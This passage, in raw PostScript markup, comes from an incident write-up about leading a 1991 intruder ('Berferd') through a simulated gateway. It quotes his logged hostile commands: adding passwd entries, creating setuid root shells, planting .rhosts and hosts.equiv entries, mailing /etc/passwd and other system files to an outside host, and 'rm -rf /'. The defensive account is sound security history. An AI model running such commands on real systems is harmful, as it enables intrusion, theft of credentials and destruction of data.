q(@e)q(mb)q(ezz)q(le)q(.St)q(an)q(fo)q(rd.)q(ED)q(U>)150 640 y(From:)e(root@res)q(ea)q(rch)q(.a)q(tt)q(.co)q(m)150 680 y(Date:)g(Tue,)h (15)e(Jan)g(91)h(21:48)g(EST)150 719 y(To:)g(adrian@emb)q(ez)q(zle)q(.s)q(ta) q(nfo)q(rd)q(.ed)q(u)150 759 y(Root:)g(mgajqD9n)q(OA)q(VDw)q(:0)q(:2)q(:00)q (00)q(-Ad)q(mi)q(n\()q(000)q(0\))q(:/:)150 798 y(Daemon:)h(*:1:1:00)q(00-)q (Ad)q(mi)q(n\(0)q(00)q(0\):)q(/:)150 837 y(Bin:)f(*:2:2:000)q(0-)q(Adm)q(in)q (\(0)q(000)q(\):)q(/bi)q(n:)150 877 y(Sys:)g(*:3:3:000)q(0-)q(Adm)q(in)q(\(0) q(000)q(\):)q(/us)q(r/)q(v9)q(/sr)q(c:)150 916 y(Adm:)g(*:4:4:000)q(0-)q(Adm) q(in)q(\(0)q(000)q(\):)q(/us)q(r/)q(ad)q(m:)150 956 y(Uucp:)g(*:5:5:00)q(00)q (-uu)q(cp)q(\(0)q(000)q(\):)q(/us)q(r/)q(li)q(b/u)q(uc)q(p:)150 995 y(Nuucp:)h(*:10:10:0)q(000)q(-u)q(uc)q(p\(0)q(00)q(0\):)q(/u)q(sr)q(/sp)q (oo)q(l/u)q(uc)q(pp)q(ubl)q(ic)q(:/u)q(sr)q(/l)q(ib/)q(uu)q(cp/)q(uu)q(ci)q (co)150 1035 y(Ftp:)f(anonymous)q(:7)q(1:1)q(4:)q(fi)q(le)i(transfer:)q(/:n)q (o)g(soap)150 1074 y(Ches:)e(j2PPWsiV)q(al)q(..Q)q(:2)q(00)q(:1:)q(me)q(:/u)q (/c)q(he)q(s:/)q(bi)q(n/s)q(h)150 1113 y(Dmr:)g(a98tVGlT7)q(Gi)q(aM:)q(20)q (2:)q(1:D)q(en)q(nis)q(:/)q(u/)q(dmr)q(:/)q(bin)q(/s)q(h)150 1153 y(Rtm:)g(5bHD/k5k2)q(mT)q(Ts:)q(20)q(3:)q(1:R)q(ob)q(:/u)q(/r)q(tm)q (:/b)q(in)q(/sh)150 1192 y(Berferd:)i(deJCw4bQcN)q(T3)q(Y:)q(204)q(:1)q(:Fr)q (ed)q(:/)q(u/b)q(er)q(fer)q(d:)q(/b)q(in/)q(sh)150 1232 y(Td:)e(PXJ.d9CgZ9)q (Dm)q(A:2)q(06)q(:1)q(:To)q(m:)q(/u/)q(td)q(:/)q(bin)q(/s)q(h)150 1271 y(Status:)h(R)150 1311 y(---------)q(--)q(-)150 1390 y(Please)g(let)f (me)f(know)h(if)f(you)h(heard)g(of)g(him.)0 1486 y Ff(My)10 b(bogus)g(password)g(\256le)h(had)f(traveled)g(to)g(France!)16 b(A)10 b(con\256guration)f(error)h(caused)i(our)d(mailer)i(to)f(identify)e (the)i(password)h(text)0 1536 y(as)g(RFC)e(822)h(header)h(lines,)f(and)g (carefully)f(adjusted)h(the)g(format)g(accordingly)m(.)k(The)d(\256rst)f (letter)f(was)i(capitalized,)f(and)g(there)g(was)0 1586 y(a)h(space)g(added)g (after)f(the)g(\256rst)g(colon)g(on)g(each)h(line.)0 1717 y Fg(3.)21 b(An)10 b(Evening)g(with)g(Berferd)83 1813 y Ff(On)h(Sunday)f (evening,)h(January)g(20,)g(I)g(was)h(riveted)e(to)g(CNN)h(like)f(most)h (people.)17 b(A)11 b(CNN)f(bureau)h(chief)g(in)f(Jerusalem)i(was)0 1863 y(casting)e(about)g(for)f(a)i(gas)g(mask.)16 b(I)10 b(was)h(quite)e (annoyed)h(when)h(my)f(terminal)g(announced)g(a)h(security)f(event:)150 1949 y Fb(22:33)114 b(finger)25 b(attempt)g(on)f(berferd)0 2045 y Ff(A)9 b(couple)f(of)h(minutes)f(later)h(someone)h(used)f(the)f Fc(debug)h Ff(command)g(to)g(submit)f(commands)h(to)g(be)g(executed)g(as)h (root\320he)d(wanted)0 2095 y(our)j(mailer)g(to)g(change)h(our)e(password)i (\256le!)150 2181 y Fb(22:36)114 b(echo)24 b("beferdd)q(::3)q(00)q(:1:)q(ma)q (yb)q(e)h(Beferd:/)q(:/)q(bin)q(/s)q(h")h(>>/etc/pa)q(ssw)q(d)374 2221 y(cp)d(/bin/sh)j(/tmp/shell)374 2260 y(chmod)f(4755)f(/tmp/shell)0 2356 y Ff(Again,)10 b(the)g(connection)g(came)i(from)e Fa(EMBEZZLE)p Ff(.)p Fa(ST)m(ANFORD)p Ff(.)q Fa(EDU)p Ff(.)0 2424 y(What)i(should)e(I)h (do?)19 b(I)11 b(didn')o(t)f(want)h(to)g(actually)g(give)g(him)h(an)f (account)h(on)f(our)g(gateway)m(.)20 b(Why)11 b(invite)f(trouble?)18 b(I)11 b(would)g(have)0 2474 y(no)f(keystroke)g(logs)f(of)h(his)g(activity)m (,)g(and)g(would)f(have)i(to)f(clean)g(up)g(the)g(whole)g(mess)i(later)n(.)0 2542 y(I'd)h(like)f(to)h(string)f(him)h(along)g(a)g(little)f(to)h(see)h(what) f(other)g(things)f(he)h(had)g(in)g(mind.)24 b(Perhaps)14 b(I)f(could)f (emulate)i(the)f(operating)0 2591 y(system)f(by)f(hand.)20 b(This)11 b(means)i(that)e(I'd)g(have)h(to)g(teach)g(him)f(that)g(the)h (machine)g(is)g(slow)m(,)g(because)h(I)f(am)g(no)f(match)i(for)e(a)h(MIPS)0 2641 y(M/120.)k(It)10 b(also)h(meant)g(that)f(I)h(would)f(have)h(to)f(create) j(a)e(somewhat)g(consistent)f(simulated)g(system,)i(based)g(on)e(some)i (decisions)e(I)0 2691 y(made)h(up)f(as)h(I)f(went)g(along.)15 b(I)10 b(already)h(had)f(one)g(Decision,)h(because)g(he)g(had)f(received)h(a) g(password)f(\256le:)p eop %%Page: 5 5 4 bop 83 42 a Fg(Decision)10 b(1)21 b Fe(Ftp')-5 b(s)9 b(passwor)n(d)h (\256le)h(was)f(the)g(r)n(eal)g(one.)0 148 y Ff(Here)h(were)g(a)g(couple)f (more:)83 254 y Fg(Decision)g(2)21 b Fe(The)12 b(gateway)f(machine)g(is)g (poorly)g(administer)n(ed.)19 b(\(After)11 b(all,)h(it)e(had)h(the)h(DEBUG)g (hole,)g(and)f(the)g(FTP)83 304 y(dir)n(ectory)g(should)e(never)j(contain)d (a)h(r)n(eal)g(passwor)n(d)g(\256le.\))83 409 y Fg(Decision)g(3)21 b Fe(The)7 b(gateway)g(machine)g(is)g(t)o(erribly)g(slo)o(w)m(.)k(It)c(could) g(take)g Ff(hours)f Fe(for)g(mai)o(l)h(t)o(o)f(get)h(t)o(hr)n(ough\320)o (even)g(overnight!)0 515 y Ff(So)k(I)h(wanted)f(him)h(to)e(think)g(he)i(had)g (changed)g(our)f(password)g(\256le,)h(but)f(didn')o(t)f(want)h(to)g(actually) g(let)g(him)h(log)e(in.)19 b(I)11 b(could)g(create)0 565 y(an)g(account,)f (but)g(make)h(it)f(inoperable.)k(How?)83 671 y Fg(Decision)c(4)21 b Fe(The)10 b(shell)g(doesn')-5 b(t)10 b(r)n(eside)i(in)d Fc(/bin)p Fe(,)i(it)e(r)n(esides)i(somewher)n(e)h(else.)0 778 y Ff(This)d(decision)f (was)i(pretty)e(silly)m(,)g(but)g(I)h(had)g(nothing)e(to)h(lose.)15 b(I)8 b(whipped)g(up)h(a)g(test)g(account)g Fc(b)g Ff(with)f(a)h(little)e (shell)i(script.)14 b(It)8 b(would)0 828 y(send)i(me)i(mail)e(when)g(it)g (was)g(called,)h(and)g(had)f(some)h(sleeps)g(in)e(it)h(to)g(slow)f(it)h (down.)k(The)d(caller)g(would)e(see)i(this:)150 916 y Fb(RISC/os)25 b(\(inet\))150 995 y(login:)g(b)150 1034 y(RISC/os)g(\(UMIPS\))h(4.0)d(inet) 150 1074 y(Copyright)j(1986,)f(MIPS)f(Computer)h(Systems)150 1113 y(All)f(Rights)h(Reserved)150 1231 y(Shell)f(not)g(found)0 1330 y Ff(Decision)9 b(3)g(explained)g(why)g(it)g(took)f(about)h(ten)g (minutes)g(for)g(the)g(addition)f(to)g(the)i(password)f(\256le.)15 b(I)9 b(changed)h(the)f Fc(b)h Ff(to)f Fc(beferdd)0 1380 y Ff(in)h(the)g(real)g(password)h(\256le.)k(While)10 b(I)g(was)h(setting)e (this)g(up)h(he)h(tried)e(again:)150 1468 y Fb(22:41)114 b(echo)24 b("bferd)h(::301:1::)q(/:)q(/b)q(in/)q(sh)q(")g(>>)f(/etc/passw)q(d)0 1567 y Ff(Here')n(s)10 b(another)f(proposed)g(addition)f(to)h(our)h(password) f(\256le.)15 b(He)c(must)e(have)h(put)f(the)h(space)h(in)e(after)h(the)f (login)f(name)j(because)g(the)0 1617 y(previous)f(command)h(hadn')o(t)f(been) h(\252executed\272)g(yet,)g(and)g(he)f(remembered)i(the)f(RFC)f(822)f(space)j (in)e(the)g(\256le)h(we)g(sent)f(him.)16 b(Quite)0 1666 y(a)11 b(\257exible)f(fellow)m(,)g(actually)m(.)15 b(He)c(got)e(impatient)g(while)h (I)g(installed)f(the)h(new)h(account:)150 1755 y Fb(22:45)114 b(talk)24 b(adrian@e)q(mbe)q(zz)q(le.)q(st)q(an)q(d\303H)q(fo)q(rd.)q(ed)q(u) 374 1794 y(talk)g(adrian@e)q(mbe)q(zz)q(le.)q(st)q(an)q(for)q(d.)q(edu)83 1901 y Fg(Decision)10 b(5)21 b Fe(W)l(e)10 b(don')-5 b(t)10 b(have)h(a)f Ff(talk)f Fe(command.)83 2005 y Fg(Decision)h(6)21 b Fe(Err)n(ors)11 b(ar)n(e)g(not)f(r)n(eported)g(to)g(the)g(invader)g(when)g (the)g(DEBUG)h(hole)e(is)h(used.)16 b(\(I)10 b(assume)g(this)f(is)h(actually) 83 2055 y(true)k(anyway)n(.\))25 b(Also,)15 b(any)f(err)n(oneous)g(commands)g (will)e(abort)h(the)g(script)h(and)f(pr)n(event)i(the)e(pr)n(ocessing)h(of)g (further)83 2105 y(commands)c(in)g(the)g(same)g(script.)0 2211 y Ff(The)i Fe(talk)f Ff(request)g(had)g(come)i(from)e(a)g(dif)o(ferent)g (machine)h(at)f(Stanford.)18 b(I)11 b(noti\256ed)f(them)i(in)e(case)j(they)e (didn')o(t)f(know)m(.)18 b(I)11 b(checked)0 2261 y(for)f(Scuds)g(on)g(the)g (TV)-5 b(.)0 2329 y(He)12 b(had)f(chosen)h(to)e(attack)i(the)f Fc(berferd)g Ff(account.)18 b(This)12 b(name)g(came)h(from)e(the)g(old)f (Dick)i(V)-5 b(an)11 b(Dyke)h(show)f(when)g(Jerry)g(V)-5 b(an)0 2379 y(Dyke)10 b(called)h(Dick)f(\252Berferd\272)h(\252because)h(he)f(looked) e(like)h(one.\272)15 b(It)10 b(seemed)i(like)e(a)g(good)g(name)h(for)f(our)g (cracker)n(.)0 2446 y(There)h(was)g(a)g(\257urry)f(of)f(new)i(probes.)k(I)10 b(guess)h(Berferd)f(didn')o(t)f(have)i(cable)g(TV)-5 b(.)150 2535 y Fb(22:48)114 b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)46 b(bferd)h(from)f(Tip-Quad)q(A.)q(Sta)q(nf)q(or)q(d.E)q(DU)150 2574 y(22:48)114 b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)46 b(bferd)h(from)f(Tip-Quad)q(A.)q(Sta)q(nf)q(or)q(d.E)q(DU)150 2613 y(22:49)114 b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)46 b(bferd)h(from)f(embezzle)q(.S)q(tan)q(fo)q(rd)q(.ED)q(U)150 2653 y(22:51)114 b(\(Notified)26 b(Stanford)g(of)d(the)h(use)g(of)f (Tip-QuadA)q(.St)q(an)q(fo)q(rd.)q(ED)q(U\))150 2692 y(22:51)114 b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)46 b(bferd)h(from)f(embezzle)q (.S)q(tan)q(fo)q(rd)q(.ED)q(U)p eop %%Page: 6 6 5 bop 150 42 a Fb(22:51)114 b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)46 b(bferd)h(from)f(embezzle)q(.S)q(tan)q(fo)q(rd)q(.ED)q(U)150 81 y(22:55)114 b(echo)24 b("bfrd)h(::303:1::/)q(tm)q(p:)q(/bi)q(n/)q(sh")h (>>)e(/etc/passw)q(d)150 120 y(22:57)114 b(\(Added)25 b(bfrd)f(to)f(the)h (real)g(password)i(file.\))150 160 y(22:58)114 b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)46 b(bfrd)h(from)f(embezzle.)q(St)q(anf)q(or) q(d.)q(EDU)150 199 y(22:58)114 b(Attempt)25 b(to)f(login)g(to)f(inet)i(with) 46 b(bfrd)h(from)f(embezzle.)q(St)q(anf)q(or)q(d.)q(EDU)150 239 y(23:05)114 b(echo)24 b("36.92.0)q(.20)q(5")i(>/dev/nul)q(l)374 278 y(echo)e("36.92.0)q(.20)q(5)115 b(embezzle)q(.st)q(an)q(fo)q(rd.)q(ed)q (u">)q(>/)q(et)q(c./)q(\303H)q(\303H\303)q(H)150 318 y(23:06)f(Attempt)25 b(to)f(login)g(to)f(inet)i(with)46 b(guest)h(from)f(rice-che)q(x.)q(ai.)q(mi) q(t.)q(edu)150 357 y(23:06)114 b(echo)24 b("36.92.0)q(.20)q(5)115 b(embezzle)q(.st)q(an)q(fo)q(rd.)q(ed)q(u")26 b(>>)d(/etc/host)q(s)150 396 y(23:08)114 b(echo)24 b("embezzl)q(e.s)q(ta)q(nfo)q(rd)q(.e)q(du)i (adrian">>)q(/tm)q(p/)q(.rh)q(os)q(ts)0 492 y Ff(Apparently)11 b(he)h(was)g(trying)e(to)h Fe(rlogin)f Ff(to)h(our)h(gateway)m(.)20 b(This)12 b(requires)f(appropriate)g(entries)g(in)g(some)i(local)e(\256les.) 20 b(At)12 b(the)f(time)0 542 y(we)g(did)e(not)h(detect)g(attempted)g Fe(rlogin)f Ff(commands.)150 627 y Fb(23:09)114 b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)46 b(bfrd)h(from)f(embezzle.)q(St)q(anf)q(or) q(d.)q(EDU)150 666 y(23:10)114 b(Attempt)25 b(to)f(login)g(to)f(inet)i(with) 46 b(bfrd)h(from)f(embezzle.)q(St)q(anf)q(or)q(d.)q(EDU)150 706 y(23:14)114 b(mail)24 b(adrian@e)q(mbe)q(zz)q(le.)q(st)q(an)q(for)q(d.)q (edu)i(<)d(/etc/inet)q(d.)q(co)q(nf)374 745 y(ps)g(-aux|mai)q(l)j(adrian@emb) q(ez)q(zle)q(.s)q(tan)q(fo)q(rd)q(.ed)q(u)0 840 y Ff(Following)9 b(the)j(presumed)g(failed)f(attempts)g(to)g Fe(rlogin)p Ff(,)g(Berferd)h (wanted)f(our)g Fc(inetd.conf)g Ff(\256le)h(to)f(discover)g(which)g(services) 0 890 y(we)g(did)e(provide.)14 b(I)d(didn')o(t)d(want)i(him)g(to)g(see)h(the) g(real)f(one,)h(and)f(it)g(was)h(too)e(much)i(trouble)e(to)g(make)j(one.)83 993 y Fg(Decision)e(7)21 b Fe(The)9 b(gateway)e(computer)i(is)f(not)f (deterministic.)14 b(\(W)l(e've)9 b(always)f(suspected)h(that)e(of)h (computers)g(anyway)n(.\))150 1085 y Fb(23:28)114 b(echo)24 b("36.92.0)q(.20)q(5)115 b(embezzle)q(.st)q(an)q(fo)q(rd.)q(ed)q(u")26 b(>>)d(/etc/host)q(s)374 1124 y(echo)h("embezzl)q(e.s)q(ta)q(nfo)q(rd)q(.e)q (du)48 b(adrian")26 b(>>)d(/tmp/.rho)q(sts)374 1164 y(ps)g(-aux|mai)q(l)j (adrian@emb)q(ez)q(zle)q(.s)q(tan)q(fo)q(rd)q(.ed)q(u)374 1203 y(mail)e(adrian@e)q(mbe)q(zz)q(le.)q(st)q(an)q(for)q(d.)q(edu)i(<)d (/etc/inet)q(d.)q(co)q(nf)0 1305 y Ff(I)13 b(didn')o(t)f(want)i(him)f(to)g (see)i(a)f Fe(ps)f Ff(output)f(either)n(.)24 b(Fortunately)m(,)14 b(his)f(Berkeley)g Fe(ps)h Ff(command)g(switches)g(wouldn')o(t)e(work)h(on)g (our)0 1355 y(System)e(V)f(machine.)0 1423 y(At)h(this)f(point)g(I)h(called)g (CER)n(T)m(.)g(This)g(was)h(an)g(extended)f(attack,)h(and)f(there)g(ought)f (to)g(be)i(someone)g(at)f(Stanford)f(tracing)h(the)g(call.)0 1473 y(I)g(didn')o(t)f(realize)h(it)g(would)f(take)h(weeks)h(to)f(get)f(a)i (trace.)19 b(I)11 b(wasn')o(t)g(sure)g(exactly)g(what)g(CER)n(T)g(does)g(in)g (these)g(circumstances.)19 b(Do)0 1522 y(they)12 b(call)h(The)h(Feds?)23 b(Roust)11 b(a)j(prosecutor?)22 b(Activate)12 b(an)h(international)e(phone)h (tap)h(network?)22 b(What)13 b(they)f(did)g(was)h(log)f(and)0 1572 y(monitor)c(everything,)h(and)h(try)g(to)f(get)h(me)g(in)g(touch)f(with) g(a)h(system)h(manager)f(at)g(Stanford.)15 b(They)10 b(seem)h(to)f(have)g(a)g (very)g(good)f(list)0 1622 y(of)h(contacts.)0 1690 y(By)g(this)f(time)i(I)f (had)g(numerous)g(windows)g(on)g(my)g(terminal)g(running)e Fe(tail)h(-f)h Ff(on)g(various)g(log)f(\256les.)16 b(I)10 b(could)g(monitor)f (Riyadh)g(and)0 1740 y(all)h(those)g(demons)g(at)h(the)f(same)i(time.)j(The)c (action)e(resumed)i(with)f(FTP:)150 1825 y Fb(Jan)24 b(20)f(23:36:48)j(inet)e (ftpd[14437)q(]:)i(<---)e(220)g(inet)g(FTP)g(server)778 1864 y(\(Version)h(4.265)g(Fri)f(Feb)f(2)g(13:39:38)j(EST)d(1990\))i(ready.)150 1904 y(Jan)f(20)f(23:36:55)j(inet)e(ftpd[14437)q(]:)i(------->)g(user)e (bfrd\303M)150 1943 y(Jan)g(20)f(23:36:55)j(inet)e(ftpd[14437)q(]:)i(<---)e (331)g(Password)i(required)f(for)f(bfrd.)150 1982 y(Jan)g(20)f(23:37:06)j (inet)e(ftpd[14437)q(]:)i(------->)g(pass\303M)150 2022 y(Jan)e(20)f (23:37:06)j(inet)e(ftpd[14437)q(]:)i(<---)e(500)g('PASS':)h(command)h(not)d (understo)q(od.)150 2061 y(Jan)h(20)f(23:37:13)j(inet)e(ftpd[14437)q(]:)i (------->)g(pass\303M)150 2101 y(Jan)e(20)f(23:37:13)j(inet)e(ftpd[14437)q (]:)i(<---)e(500)g('PASS':)h(command)h(not)d(understo)q(od.)150 2140 y(Jan)h(20)f(23:37:24)j(inet)e(ftpd[14437)q(]:)i(------->)g(HELP\303M) 150 2180 y(Jan)e(20)f(23:37:24)j(inet)e(ftpd[14437)q(]:)i(<---)e(214-)g(The)g (following)i(commands)g(are)778 2219 y(recognized)g(\(*)d(=>'s)i(unimplemen)q (te)q(d\).)150 2258 y(Jan)f(20)f(23:37:24)j(inet)e(ftpd[14437)q(]:)i(<---)e (214)g(Direct)h(comments)h(to)d(ftp-bugs@)q(ine)q(t.)150 2298 y(Jan)h(20)f(23:37:31)j(inet)e(ftpd[14437)q(]:)i(------->)g(QUIT\303M)150 2337 y(Jan)e(20)f(23:37:31)j(inet)e(ftpd[14437)q(]:)i(<---)e(221)g(Goodbye.) 150 2377 y(Jan)g(20)f(23:37:31)j(inet)e(ftpd[14437)q(]:)i(Logout,)f(status)g (0)150 2416 y(Jan)f(20)f(23:37:31)j(inet)e(inetd[116])q(:)i(exit)e(14437)150 2456 y(Jan)g(20)f(23:37:41)j(inet)e(inetd[116])q(:)i(finger)47 b(request)25 b(from)47 b(36.92.0.2)q(05)h(pid)24 b(14454)150 2495 y(Jan)g(20)f(23:37:41)j(inet)e(inetd[116])q(:)i(exit)e(14454)150 2574 y(23:38)114 b(finger)25 b(attempt)g(on)f(berferd)150 2613 y(23:48)114 b(echo)24 b("36.92.0)q(.20)q(5)115 b(embezzle)q(.st)q(an)q(fo)q (rd.)q(ed)q(u")26 b(>>)d(/etc/host)q(s.)q(eq)q(uiv)150 2653 y(23:53)114 b(mv)23 b(/usr/etc)q(/f)q(ing)q(er)q(d)i(/usr/etc)q(/f)q(ing)q (er)q(d.)q(b)374 2692 y(cp)e(/bin/sh)j(/usr/etc/f)q(in)q(ge)q(rd)p eop %%Page: 7 7 6 bop 0 42 a Ff(Decision)10 b(4)g(dictates)h(that)f(the)g(last)g(line)g(must) g(fail.)16 b(Therefore,)11 b(he)g(just)f(broke)g(the)g Fe(\256nger)h Ff(service)g(on)f(my)h(simulated)f(machine.)16 b(I)0 91 y(turned)9 b(of)o(f)h(the)h(real)f(service.)150 180 y Fb(23:57)114 b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)46 b(bfrd)h(from)f(embezzle.)q(St)q(anf)q(or) q(d.)q(EDU)150 219 y(23:58)114 b(cp)23 b(/bin/csh)j(/usr/etc/)q(fi)q(ng)q (erd)0 318 y Fe(Csh)10 b Ff(wasn')o(t)g(in)g Fe(/bin)f Ff(either)n(,)i(so)f (that)f(command)j(\252failed.\272)150 414 y Fb(00:07)114 b(cp)23 b(/usr/etc)q(/f)q(ing)q(er)q(d.b)j(/usr/etc)q(/fi)q(ng)q(er)q(d)0 521 y Ff(OK.)11 b Fe(Finger)n(d)f Ff(worked)g(again.)15 b(Nice)c(of)f (Berferd)g(to)g(clean)h(up.)150 609 y Fb(00:14)114 b(passwd)25 b(bfrt)374 649 y(bfrt)374 688 y(bfrt)0 787 y Ff(Now)12 b(he)g(was)g(trying)e (to)i(change)g(the)g(password.)20 b(This)11 b(would)g(never)h(work,)g(since)h Fe(passwd)e Ff(reads)h(its)f(input)g(from)g Fc(/dev/tty)p Ff(,)0 837 y(not)e(the)i(shell)e(script)h(that)g Fe(sendmail)f Ff(would)g(create.) 150 925 y Fb(00:16)114 b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)46 b(bfrd)h(from)f(embezzle.)q(St)q(anf)q(or)q(d.)q(EDU)150 965 y(00:17)114 b(echo)24 b("/bin/sh)q(")h(>)e(/tmp/She)q(ll)374 1004 y(chmod)i(755)e(/tmp/she)q(ll)374 1044 y(chmod)i(755)e(/tmp/She)q(ll)150 1083 y(00:19)114 b(chmod)25 b(4755)f(/tmp/shell)150 1123 y(00:19)114 b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)46 b(bfrd)h(from)f(embezzle.)q (St)q(anf)q(or)q(d.)q(EDU)150 1162 y(00:19)114 b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)46 b(bfrd)h(from)f(embezzle.)q(St)q(anf)q(or) q(d.)q(EDU)150 1201 y(00:21)114 b(Attempt)25 b(to)f(login)g(to)f(inet)i(with) 46 b(bfrd)h(from)f(embezzle.)q(St)q(anf)q(or)q(d.)q(EDU)150 1241 y(00:21)114 b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)46 b(bfrd)h(from)f(embezzle.)q(St)q(anf)q(or)q(d.)q(EDU)0 1340 y Ff(At)10 b(this)g(point)f(I)h(was)h(tired.)16 b(CNN)10 b(had)g(nothing)f (interesting)g(to)h(report)f(from)i(the)f(Middle)g(East.)16 b(I)11 b(wanted)f(to)g(continue)g(watching)0 1389 y(Berferd)i(in)f(the)g (morning,)h(but)e(I)i(had)g(to)f(shut)g(down)g(my)h(simulated)f(machine)i (until)d(then.)19 b(I)11 b(was)i(wondering)d(how)h(much)i(ef)o(fort)0 1439 y(this)d(was)i(worth.)k(Clif)o(f)9 b(Stoll)h(had)h(done)g(a)g(\256ne)g (job)f(before[2])h(and)g(it)f(wasn')o(t)h(very)g(interesting)e(doing)h(it)g (over)g(again.)18 b(It)10 b(was)i(fun)0 1489 y(to)g(lead)h(this)f(guy)g(on,)h (but)f(what')n(s)g(the)g(goal?)23 b(I)12 b(did)g(want)g(to)g(keep)i(him)e (busy)g(so)h(that)f(someone)h(at)g(Stanford)f(could)g(trace)h(him,)0 1539 y(but)c(they)h(wouldn')o(t)f(be)i(in)e(until)g(the)h(morning.)k(I)c (could)g(just)f(shut)h(down)g(the)g(gateway)h(overnight:)h(it)e(is)g(a)h (research)g(machine,)h(not)0 1589 y(production.)20 b(I)13 b(shut)f(down)g (the)g(gateway)h(after)g(sending)f(out)g(a)h(complaint)f(about)g(possible)g (disk)g(errors.)22 b(I)13 b(made)g(sure)g(Berferd)0 1639 y(was)e(sitting)d (in)i(one)g(of)g(those)g Fe(sleep)p Ff(s)h(in)f(the)g(login)e(when)j(the)f (message)i(went)e(out.)0 1706 y(I)h(decided)h(I)f(would)f(like)h(to)f(have)i (Berferd)f(spend)g(more)h(time)f(trying)f(to)g(get)i(in)e(than)h(I)g(spent)g (leading)g(him)g(on.)18 b(\(In)10 b(the)h(long)g(run)0 1756 y(he)g(won)g(that)g(battle.\))17 b(After)11 b(half)f(an)i(hour)e(I)h (concluded)g(that)g(this)f(creep)i(wasn')o(t)f(worth)f(holding)g(up)g(a)i (night')n(s)d(worth)h(of)h(mail.)18 b(I)0 1806 y(brought)9 b(the)h(machine)h(back)f(up,)h(and)f(went)g(to)g(sleep.)0 1874 y(Berferd)j(returned)f(an)h(hour)f(later)n(.)22 b(Of)13 b(course,)h(the)e (magic)i(went)e(away)i(when)e(I)h(went)g(to)f(bed,)h(but)f(that)g(didn')o(t)g (seem)i(to)e(bother)0 1923 y(him.)j(He)10 b(was)h(hooked.)j(He)c(continued)f (his)g(attack)h(at)g(00:40.)k(The)c(logs)f(of)h(his)f(attempts)h(were)g (tedious)f(until)f(this)h(command)h(was)0 1973 y(submitted)f(for)h Fe(r)n(oot)g Ff(to)g(execute:)150 2062 y Fb(01:55)114 b(rm)23 b(-rf)h(/&)0 2160 y Fg(WHOA!)11 b Ff(Now)g(it)f(was)h(personal!)17 b(Obviously)9 b(the)h(machine')n(s)i(state)f(was)h(confusing)d(him,)i(and)g (he)h(wanted)e(to)h(cover)g(his)f(tracks.)0 2210 y(Some)15 b(crackers)h(defend)f(their)f(work,)h(stating)e(that)h(they)g(don')o(t)g(do)g (any)h(real)g(damage.)29 b(Our)14 b(cracker)i(tried)e(this)g(with)f(us,)j (and)0 2260 y(succeeded)c(with)d(this)g(command)j(on)d(other)h(systems.)0 2328 y(He)h(worked)f(for)f(a)i(few)g(more)g(minutes,)f(and)g(gave)h(up)f (until)e(morning.)150 2416 y Fb(07:12)114 b(Attempt)25 b(to)f(login)g(to)f (inet)i(with)46 b(bfrd)h(from)f(embezzle.)q(St)q(anf)q(or)q(d.)q(EDU)150 2456 y(07:14)114 b(rm)23 b(-rf)h(/&)150 2495 y(07:17)114 b(finger)25 b(attempt)g(on)f(berferd)150 2535 y(07:19)114 b(/bin/rm)25 b(-rf)f(/&)374 2574 y(/bin/rm)h(-rf)f(/&)150 2613 y(07:23)114 b(/bin/rm)25 b(-rf)f(/&)150 2653 y(07:25)114 b(Attempt)25 b(to)f(login)g(to)f (inet)i(with)46 b(bfrd)h(from)f(embezzle.)q(St)q(anf)q(or)q(d.)q(EDU)150 2692 y(09:41)114 b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)46 b(bfrd)h(from)f(embezzle.)q(St)q(anf)q(or)q(d.)q(EDU)p eop %%Page: 8 8 7 bop 0 42 a Fg(4.)21 b(The)10 b(day)g(after)83 137 y Ff(It)h(was)i(time)f (to)f(catch)i(up)f(with)e(all)i(the)g(commands)h(he)f(had)g(tried)f(after)h (I)g(went)g(to)f(sleep,)j(including)c(those)h(three)h(attempts)0 187 y(to)g(erase)h(all)f(our)f(\256les.)21 b(T)m(o)13 b(simulate)f(the)g (nasty)f Fe(rm)i Ff(command,)g(I)f(took)f(the)h(machine)h(down)f(for)f(a)i (little)d(while,)j(cleaned)g(up)e(the)0 237 y(simulated)e(password)h(\256le,) g(and)f(left)g(a)i(message)g(from)e(our)g(hapless)h(system)g(administrator)e (in)h Fc(/etc/motd)g Ff(about)g(a)h(disk)f(crash.)0 287 y(My)h(log)f(showed)i (the)f(rest)g(of)g(the)g(queued)g(commands:)150 377 y Fb(mail)24 b(adrian@em)q(be)q(zzl)q(e.)q(st)q(anf)q(or)q(d.e)q(du)i(<)d(/etc/pass)q(wd) 150 416 y(mail)h(adrian@em)q(be)q(zzl)q(e.)q(st)q(anf)q(or)q(d.e)q(du)i(<)d (/etc/host)q(s)150 456 y(mail)h(adrian@em)q(be)q(zzl)q(e.)q(st)q(anf)q(or)q (d.e)q(du)i(<)d(/etc/inet)q(d.)q(con)q(f)150 495 y(ps)g(-aux|mai)q(l)i (adrian@e)q(mb)q(ezz)q(le)q(.st)q(an)q(fo)q(rd.)q(ed)q(u)150 535 y(ps)e(-aux|mai)q(l)i(adrian@e)q(mb)q(ezz)q(le)q(.st)q(an)q(fo)q(rd.)q (ed)q(u)150 574 y(mail)f(adrian@em)q(be)q(zzl)q(e.)q(st)q(anf)q(or)q(d.e)q (du)i(<)d(/etc/inet)q(d.)q(con)q(f)0 675 y Ff(I)14 b(mailed)g(him)g(the)g (four)f(simulated)h(\256les,)i(including)c(the)i(huge)g(and)g(useless)h Fc(/etc/hosts)e Ff(\256le.)27 b(I)14 b(even)g(mailed)h(him)e(error)0 725 y(messages)f(for)e(the)g(two)g Fe(ps)g Ff(commands)h(in)f(direct)g (violation)e(of)i(the)g(no-errors)f(Decision)h(6.)0 793 y(In)g(the)g (afternoon)g(he)g(was)h(still)e(there,)h(mistyping)f(away:)150 883 y Fb(13:41)114 b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)46 b(bfrd)h(from)f(decaf.Sta)q(nf)q(ord)q(.E)q(DU)150 923 y(13:41)114 b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)46 b(bfrd)h(from)f(decaf.Sta)q 